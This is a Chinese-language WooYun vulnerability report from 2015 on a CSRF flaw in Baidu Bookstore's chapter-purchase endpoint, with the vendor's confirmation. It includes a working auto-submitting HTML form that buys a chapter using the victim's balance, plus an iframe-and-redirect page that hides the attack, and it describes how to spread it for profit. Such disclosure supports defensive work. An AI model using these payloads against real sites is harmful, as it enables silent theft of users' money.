当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094946

漏洞标题:百度书城CSRF涉及敏感操作

相关厂商:百度

漏洞作者: 90Snake

提交时间:2015-02-02 13:00

修复时间:2015-03-19 13:02

公开时间:2015-03-19 13:02

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

百度书城CSRF涉及敏感操作

详细说明:

百度书城CSRF涉及敏感操作,可被不法分子利用刷钱

漏洞证明:

1、为了做测试,我自己充值了1块钱 ~~~~(>_<)~~~~ 求报销

1.png


2、我们随便找一个图书的 VIP章节,发现需要支付,然后我们支付的时候截断

2.png


我们发现没有token之类的验证,那么我们来试试可不可以实施CSRF攻击,我们先弄一个表单

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form id="post123" name="post123" action="http://kanshu.baidu.com/buybook/buychapter" method="POST">
<input type="hidden" name="autopay" value="1" />
<input type="hidden" name="bkid" value="2014012108280744" />
<input type="hidden" name="crid" value="42" />
<script>
document.getElementById('post123').submit();
</script>
</form>
</body>
</html>


3、然后打开

3.png


我们发现报错~~~
难道不行吗??我们还是回去看看吧

4.png


钱已经扣了~~~
那么这样攻击呢,会被发现,攻击者为了实攻击目的达到隐秘的效果,会将此页面放到一个 iframe标签里面,然后设置一个跳转

<html>
<table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><h1>Hacked by Snake </h1></td></tr></tbody></table><!--设置这个伪造页面的文字内容-->
<meta http-equiv="refresh" content="4;url=http://www.baidu.com/"> <!--设置一个正常的跳转页面!-->
<title>hacked by Snake</title>
<iframe src="http://127.0.0.1/csrf.html"></iframe><!--csrf攻击页面的地址!-->
</html>


例如,这样就可以当用户打开的时候会出来一个黑色覆盖的页面(攻击者会伪装的更好,这里只是举例),然后不知不觉钱就没了,然后跳转到百度去
么,如果有不法分子,找一个书城的作者合作,或者自己想法设法的也加入VIP作者里面,然后通过你们的站内信,评论,贴吧等内部产品,或者其他传播途径,即可实施攻击,成功刷钱~~
个人感觉这个CSRF危害很大,不是鸡肋的,毕竟,CSRF是沉睡的巨人

修复方案:

你们更专业

版权声明:转载请注明来源 90Snake@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-02-02 15:13

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无